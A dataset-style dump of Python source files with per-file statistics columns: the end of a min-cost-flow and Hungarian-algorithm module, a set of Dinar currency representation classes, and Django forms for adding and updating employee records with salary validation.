        preve = [-1] * len(self.graph)  # edge used to reach each vertex
        # Potentials: keep reduced costs (cost + h[v] - h[u]) non-negative.
        h = [0] * len(self.graph)
        remains = flow
        while remains > 0:
            dist = [float('inf')] * len(self.graph)
            dist[from_v] = 0
            heap = [(0, from_v)]
            # Dijkstra on reduced costs.
            while heap:
                d, v = heapq.heappop(heap)
                if d > dist[v]:
                    continue  # stale heap entry
                for edge in self.graph[v]:
                    u, cap, cost, rev = edge
                    if cap > 0 and dist[v] + cost + h[v] - h[u] < dist[u]:
                        dist[u] = dist[v] + cost + h[v] - h[u]
                        prevv[u] = v
                        preve[u] = edge
                        heapq.heappush(heap, (dist[u], u))
            if dist[to_v] == float('inf'):
                # No more flow can be pushed.
                return -1
            # Update potentials with the new shortest distances.
            for i, d in enumerate(dist):
                h[i] += d
            # Bottleneck capacity along the shortest path.
            flow = remains
            v = to_v
            while v != from_v:
                cap = preve[v][1]
                flow = min(cap, flow)
                v = prevv[v]
            # Push `flow` along the shortest path.
            v = to_v
            while v != from_v:
                preve[v][1] -= flow
                preve[v][3][1] += flow
                v = prevv[v]
            remains -= flow
            # h[to_v] now equals the true shortest-path cost from the source.
            total_cost += flow * h[to_v]
        return total_cost
def hungarian(mat):
    """
    Pick one element from each row and each column so the total cost is
    minimized; return the chosen row indices and column indices.

    Hungarian algorithm, O(N^3) (delegated to scipy).
    https://en.wikipedia.org/wiki/Hungarian_algorithm

    :param list of (list of int) mat:
    :rtype: list of int, list of int
    """
    import numpy as np
    from scipy.optimize import linear_sum_assignment

    cost_matrix = np.array(mat, dtype=int)
    row_ind, col_ind = linear_sum_assignment(cost_matrix)
    return list(row_ind), list(col_ind)
| 29.358531
| 91
| 0.437578
| 1,623
| 13,593
| 3.595194
| 0.083179
| 0.046272
| 0.039417
| 0.039075
| 0.824165
| 0.822108
| 0.803428
| 0.778406
| 0.774979
| 0.774979
| 0
| 0.009947
| 0.445303
| 13,593
| 462
| 92
| 29.422078
| 0.76366
| 0.18333
| 0
| 0.864583
| 0
| 0
| 0.002353
| 0
| 0
| 0
| 0
| 0
| 0.017361
| 1
| 0.069444
| false
| 0
| 0.013889
| 0
| 0.170139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb7e157f57a6f7d812fdc6acf47472a86c2c8614
| 21,827
|
py
|
Python
|
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | 2
|
2021-03-26T18:19:57.000Z
|
2021-07-27T01:15:50.000Z
|
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Dinar currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class BahrainiDinar(Currency):
    """Bahraini Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import BahrainiDinar
        >>> bahraini_dinar = BahrainiDinar(
        ...     amount=123456.789)
        >>> print(bahraini_dinar)
        د.ب. ١٢٣٬٤٥٦٫٧٨٩

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = '\u066B',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '\u066C',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'BahrainiDinar':
        """Class creator.

        Returns:
            BahrainiDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='BHD',
            numeric_code='048',
            symbol='د.ب.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ب.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='٠١٢٣٤٥٦٧٨٩-',
            international=international)
class AlgerianDinar(Currency):
    """Algerian Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import AlgerianDinar
        >>> algerian_dinar = AlgerianDinar(
        ...     amount=123456.789)
        >>> print(algerian_dinar)
        123.456,79 د.ج.

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 2.
        decimal_sign (str, optional): Decimal symbol. Defaults to ','.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to False.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 2,
            decimal_sign: Optional[str] = ',',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '.',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = False,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'AlgerianDinar':
        """Class creator.

        Returns:
            AlgerianDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='DZD',
            numeric_code='012',
            symbol='د.ج.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ج.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='',
            international=international)
class IraqiDinar(Currency):
    """Iraqi Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import IraqiDinar
        >>> iraqi_dinar = IraqiDinar(
        ...     amount=123456.789)
        >>> print(iraqi_dinar)
        د.ع. ١٢٣٬٤٥٦٫٧٨٩

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = '\u066B',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '\u066C',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'IraqiDinar':
        """Class creator.

        Returns:
            IraqiDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='IQD',
            numeric_code='368',
            symbol='د.ع.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ع.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='٠١٢٣٤٥٦٧٨٩-',
            international=international)
class JordanianDinar(Currency):
    """Jordanian Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import JordanianDinar
        >>> jordanian_dinar = JordanianDinar(
        ...     amount=123456.789)
        >>> print(jordanian_dinar)
        د.أ. ١٢٣٬٤٥٦٫٧٨٩

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = '\u066B',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '\u066C',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'JordanianDinar':
        """Class creator.

        Returns:
            JordanianDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='JOD',
            numeric_code='400',
            symbol='د.أ.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.أ.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='٠١٢٣٤٥٦٧٨٩-',
            international=international)
class KuwaitiDinar(Currency):
    """Kuwaiti Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import KuwaitiDinar
        >>> kuwaiti_dinar = KuwaitiDinar(
        ...     amount=123456.789)
        >>> print(kuwaiti_dinar)
        د.ك. ١٢٣٬٤٥٦٫٧٨٩

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = '\u066B',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '\u066C',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'KuwaitiDinar':
        """Class creator.

        Returns:
            KuwaitiDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='KWD',
            numeric_code='414',
            symbol='د.ك.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ك.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='٠١٢٣٤٥٦٧٨٩-',
            international=international)
class LibyanDinar(Currency):
    """Libyan Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import LibyanDinar
        >>> libyan_dinar = LibyanDinar(
        ...     amount=123456.789)
        >>> print(libyan_dinar)
        د.ل. 123.456,789

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to ','.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = ',',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '.',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'LibyanDinar':
        """Class creator.

        Returns:
            LibyanDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='LYD',
            numeric_code='434',
            symbol='د.ل.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ل.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='',
            international=international)
class SerbianDinarXK(Currency):
    """Serbian Dinar XK currency representation.

    Simple usage example:
        >>> from multicurrency import SerbianDinarXK
        >>> serbian_dinar_xk = SerbianDinarXK(
        ...     amount=123456.789)
        >>> print(serbian_dinar_xk)
        123.456,79 дин.

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 2.
        decimal_sign (str, optional): Decimal symbol. Defaults to ','.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to False.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 2,
            decimal_sign: Optional[str] = ',',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '.',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = False,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'SerbianDinarXK':
        """Class creator.

        Returns:
            SerbianDinarXK: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='RSD',
            numeric_code='941',
            symbol='дин.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='дин.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='',
            international=international)
class SerbianDinarSR(Currency):
    """Serbian Dinar SR currency representation.

    Simple usage example:
        >>> from multicurrency import SerbianDinarSR
        >>> serbian_dinar_sr = SerbianDinarSR(
        ...     amount=123456.789)
        >>> print(serbian_dinar_sr)
        123 456,79 дин.

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 2.
        decimal_sign (str, optional): Decimal symbol. Defaults to ','.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to False.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 2,
            decimal_sign: Optional[str] = ',',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '\u202F',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = False,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'SerbianDinarSR':
        """Class creator.

        Returns:
            SerbianDinarSR: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='RSD',
            numeric_code='941',
            symbol='дин.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='дин.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='',
            international=international)
class TunisianDinar(Currency):
    """Tunisian Dinar currency representation.

    Simple usage example:
        >>> from multicurrency import TunisianDinar
        >>> tunisian_dinar = TunisianDinar(
        ...     amount=123456.789)
        >>> print(tunisian_dinar)
        د.ت. 123.456,789

    For more details see `multicurrency.currency.Currency` .

    Args:
        amount (Union[int, float, Decimal]): Represented value.
        decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 3.
        decimal_sign (str, optional): Decimal symbol. Defaults to ','.
        grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
        grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
        international (bool, optional): Identifies the currency using
            the 'currency' value instead of the 'symbol'. Defaults to
            False.
        symbol_separator (str, optional): Separation between the symbol
            and the value. Defaults to ' '.
        symbol_ahead (bool, optional): True if symbol goes ahead of the
            value. False otherwise. Defaults to True.
    """

    # Empty tuple rather than a mutable list: no instance attributes added.
    __slots__ = ()

    def __new__(  # pylint: disable=signature-differs,disable=unused-argument
            cls,
            amount: Union[int, float, Decimal],
            decimal_places: Optional[int] = 3,
            decimal_sign: Optional[str] = ',',
            grouping_places: Optional[int] = 3,
            grouping_sign: Optional[str] = '.',
            international: Optional[bool] = False,
            symbol_ahead: Optional[bool] = True,
            symbol_separator: Optional[str] = '\u00A0',
            **other) -> 'TunisianDinar':
        """Class creator.

        Returns:
            TunisianDinar: new object.
        """
        return Currency.__new__(
            cls,
            amount=amount,
            alpha_code='TND',
            numeric_code='788',
            symbol='د.ت.',
            symbol_separator=symbol_separator,
            symbol_ahead=symbol_ahead,
            localized_symbol='د.ت.',
            decimal_places=decimal_places,
            decimal_sign=decimal_sign,
            grouping_places=grouping_places,
            grouping_sign=grouping_sign,
            convertion='',
            international=international)
| 36.561139
| 77
| 0.596921
| 2,181
| 21,827
| 5.810179
| 0.068776
| 0.049716
| 0.034091
| 0.026989
| 0.868213
| 0.868213
| 0.863163
| 0.863163
| 0.85322
| 0.815657
| 0
| 0.021526
| 0.308288
| 21,827
| 596
| 78
| 36.622483
| 0.816731
| 0.499015
| 0
| 0.803922
| 0
| 0
| 0.041069
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0
| 0.011765
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb896e4a057d40d11d1e004ea41d62e6bba70b94
| 10,397
|
py
|
Python
|
employees/forms.py
|
OSAMAMOHAMED1234/employee_system
|
290cd33c32b84c2e79f27a11bc3a6f0f74bfcc18
|
[
"MIT"
] | 3
|
2019-04-10T05:58:41.000Z
|
2020-03-19T09:44:02.000Z
|
employees/forms.py
|
bertocarl/employee_management_system
|
2b1f3b6070557d70ea415ce8bd76b8ab81a9e1f8
|
[
"MIT"
] | 6
|
2020-06-05T21:47:22.000Z
|
2022-03-11T23:51:07.000Z
|
employees/forms.py
|
cliffnyendwe/time-management-system
|
fb23e1ca537aaa8d153364a30d83f01cb7a3f64b
|
[
"MIT"
] | 3
|
2018-08-03T05:58:35.000Z
|
2019-10-09T13:57:25.000Z
|
from django import forms
from .models import Employees, Relationship
class AddEmployeeForm(forms.ModelForm):
    """Create a new ``Employees`` record, with Bootstrap-styled widgets and
    validation of the national identifier and the position-dependent salary."""

    first_name = forms.CharField(label='First name', widget=forms.TextInput(
        attrs={
            'placeholder': 'First name',
            'class': 'form-control',
        }))
    middle_name = forms.CharField(label='Middle name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Middle name',
            'class': 'form-control',
        }))
    last_name = forms.CharField(label='Last name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Last name',
            'class': 'form-control',
        }))
    full_name = forms.CharField(label='Full name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Full name',
            'class': 'form-control',
        }))
    national_identifier = forms.IntegerField(label='National Identifier', widget=forms.TextInput(
        attrs={
            'placeholder': 'National Identifier',
            'class': 'form-control',
            'type': 'number',
        }))
    age = forms.IntegerField(label='Age', widget=forms.TextInput(
        attrs={
            'placeholder': 'Age',
            'class': 'form-control',
            'type': 'number',
        }))
    date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(
        attrs={
            'placeholder': 'Date Of Birth',
            'class': 'form-control',
            'type': 'date',
        }))
    place_of_birth = forms.CharField(label='Place Of Birth', widget=forms.TextInput(
        attrs={
            'placeholder': 'Place Of Birth',
            'class': 'form-control',
        }))
    job = forms.CharField(label='Job', required=False, widget=forms.TextInput(
        attrs={
            'placeholder': 'Job',
            'class': 'form-control',
        }))
    country = forms.CharField(label='Country', widget=forms.TextInput(
        attrs={
            'placeholder': 'Country',
            'class': 'form-control',
        }))
    nationality = forms.CharField(label='Nationality', widget=forms.TextInput(
        attrs={
            'placeholder': 'Nationality',
            'class': 'form-control',
        }))
    salary = forms.IntegerField(label='Salary', widget=forms.TextInput(
        attrs={
            'placeholder': 'Salary',
            'class': 'form-control',
            'type': 'number',
        }))

    class Meta:
        model = Employees
        fields = [
            'first_name',
            'middle_name',
            'last_name',
            'full_name',
            'national_identifier',
            'age',
            'gender',
            'date_of_birth',
            'place_of_birth',
            'position',
            'job',
            'country',
            'nationality',
            'marital_status',
            'salary',
        ]

    def clean_national_identifier(self):
        """Require a unique, positive, exactly-14-digit national identifier."""
        national_identifier = self.cleaned_data.get('national_identifier')
        qs = Employees.objects.filter(national_identifier__iexact=national_identifier)
        if qs.exists():
            raise forms.ValidationError('This Employee is already Added before!')
        if int(national_identifier) <= 0:
            raise forms.ValidationError('National Identifier must be bigger than 0!')
        # Original `< 14 or > 14` collapsed to a single inequality.
        if len(str(national_identifier)) != 14:
            raise forms.ValidationError('National Identifier must be 14 number!')
        return int(national_identifier)

    def clean_salary(self):
        """Ensure the salary lies in the band allowed for the chosen position."""
        salary = self.cleaned_data.get('salary')
        position = self.cleaned_data.get('position')
        if position == 'Employee' and not 5000 <= int(salary) <= 10000:
            raise forms.ValidationError('salary for employee must be between 5000-10000')
        if position == 'Manager' and not 10000 <= int(salary) <= 19000:
            raise forms.ValidationError('salary for manager must be between 10000-19000')
        if position == 'CEO' and not 19000 <= int(salary) <= 25000:
            raise forms.ValidationError('salary for CEO must be between 19000-25000')
        return salary
class UpdateEmployeeForm(forms.ModelForm):
    """Edit an existing ``Employees`` record (no salary field; uniqueness of
    the national identifier is not re-checked so the employee can keep it)."""

    first_name = forms.CharField(label='First name', widget=forms.TextInput(
        attrs={
            'placeholder': 'First name',
            'class': 'form-control',
        }))
    middle_name = forms.CharField(label='Middle name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Middle name',
            'class': 'form-control',
        }))
    last_name = forms.CharField(label='Last name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Last name',
            'class': 'form-control',
        }))
    full_name = forms.CharField(label='Full name', widget=forms.TextInput(
        attrs={
            'placeholder': 'Full name',
            'class': 'form-control',
        }))
    national_identifier = forms.IntegerField(label='National Identifier', widget=forms.TextInput(
        attrs={
            'placeholder': 'National Identifier',
            'class': 'form-control',
            'type': 'number',
        }))
    age = forms.IntegerField(label='Age', widget=forms.TextInput(
        attrs={
            'placeholder': 'Age',
            'class': 'form-control',
            'type': 'number',
        }))
    date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(
        attrs={
            'placeholder': 'Date Of Birth',
            'class': 'form-control',
            'type': 'date',
        }))
    place_of_birth = forms.CharField(label='Place Of Birth', widget=forms.TextInput(
        attrs={
            'placeholder': 'Place Of Birth',
            'class': 'form-control',
        }))
    job = forms.CharField(label='Job', required=False, widget=forms.TextInput(
        attrs={
            'placeholder': 'Job',
            'class': 'form-control',
        }))
    country = forms.CharField(label='Country', widget=forms.TextInput(
        attrs={
            'placeholder': 'Country',
            'class': 'form-control',
        }))
    nationality = forms.CharField(label='Nationality', widget=forms.TextInput(
        attrs={
            'placeholder': 'Nationality',
            'class': 'form-control',
        }))

    class Meta:
        model = Employees
        fields = [
            'first_name',
            'middle_name',
            'last_name',
            'full_name',
            'national_identifier',
            'age',
            'gender',
            'date_of_birth',
            'place_of_birth',
            'position',
            'job',
            'country',
            'nationality',
            'marital_status',
        ]

    def clean_national_identifier(self):
        """Require a positive, exactly-14-digit national identifier."""
        national_identifier = self.cleaned_data.get('national_identifier')
        if int(national_identifier) <= 0:
            raise forms.ValidationError('National Identifier must be bigger than 0!')
        # Original `< 14 or > 14` collapsed to a single inequality.
        if len(str(national_identifier)) != 14:
            raise forms.ValidationError('National Identifier must be 14 number!')
        return int(national_identifier)
class UpdateSalaryForm(forms.ModelForm):
    """Update an employee's salary together with deduction/earning entries;
    the position travels along as a hidden field for salary validation."""

    position = forms.CharField(widget=forms.HiddenInput)
    salary = forms.IntegerField(label='Salary', widget=forms.TextInput(attrs={
        'placeholder': 'Salary', 'class': 'form-control', 'type': 'number'}))
    deduction = forms.IntegerField(label='Deduction', widget=forms.TextInput(attrs={
        'placeholder': 'Deduction', 'class': 'form-control', 'type': 'number'}))
    deduction_description = forms.CharField(
        label='Deduction Description', required=False,
        widget=forms.Textarea(attrs={
            'placeholder': 'Deduction Description', 'class': 'form-control'}))
    earning = forms.IntegerField(label='Earning', widget=forms.TextInput(attrs={
        'placeholder': 'Earning', 'class': 'form-control', 'type': 'number'}))
    earning_description = forms.CharField(
        label='Earning Description', required=False,
        widget=forms.Textarea(attrs={
            'placeholder': 'Earning Description', 'class': 'form-control'}))

    class Meta:
        model = Employees
        fields = [
            'position',
            'salary',
            'deduction',
            'deduction_description',
            'earning',
            'earning_description',
        ]

    def clean_salary(self):
        """Reject salaries outside the band allowed for the hidden position."""
        salary = self.cleaned_data.get('salary')
        position = self.cleaned_data.get('position')
        bands = {
            'Employee': (5000, 10000,
                         'salary for employee must be between 5000-10000'),
            'Manager': (10000, 19000,
                        'salary for manager must be between 10000-19000'),
            'CEO': (19000, 25000,
                    'salary for CEO must be between 19000-25000'),
        }
        if position in bands:
            low, high, message = bands[position]
            if not low <= int(salary) <= high:
                raise forms.ValidationError(message)
        return salary
class AddRelationForm(forms.ModelForm):
    """Attach a ``Relationship`` record (relative of an employee)."""

    name = forms.CharField(label='Name', widget=forms.TextInput(attrs={
        'placeholder': 'Name', 'class': 'form-control'}))
    age = forms.IntegerField(label='Age', widget=forms.TextInput(attrs={
        'placeholder': 'Age', 'class': 'form-control', 'type': 'number'}))
    date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(attrs={
        'placeholder': 'Date Of Birth', 'class': 'form-control', 'type': 'date'}))

    class Meta:
        model = Relationship
        fields = [
            'relationship_type',
            'name',
            'age',
            'date_of_birth',
        ]

    def clean_age(self):
        """Accept only strictly positive ages."""
        age = self.cleaned_data.get('age')
        if int(age) > 0:
            return age
        raise forms.ValidationError('Age must be bigger than 0!')
| 35.244068
| 113
| 0.552563
| 967
| 10,397
| 5.861427
| 0.097208
| 0.062103
| 0.087509
| 0.127911
| 0.854446
| 0.834157
| 0.819337
| 0.819337
| 0.790579
| 0.790579
| 0
| 0.018839
| 0.31586
| 10,397
| 294
| 114
| 35.363946
| 0.778012
| 0
| 0
| 0.870036
| 0
| 0
| 0.247956
| 0.00202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018051
| false
| 0
| 0.00722
| 0
| 0.187726
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbbe75b3332ba82c0b221a3037d3492817984982
| 120
|
py
|
Python
|
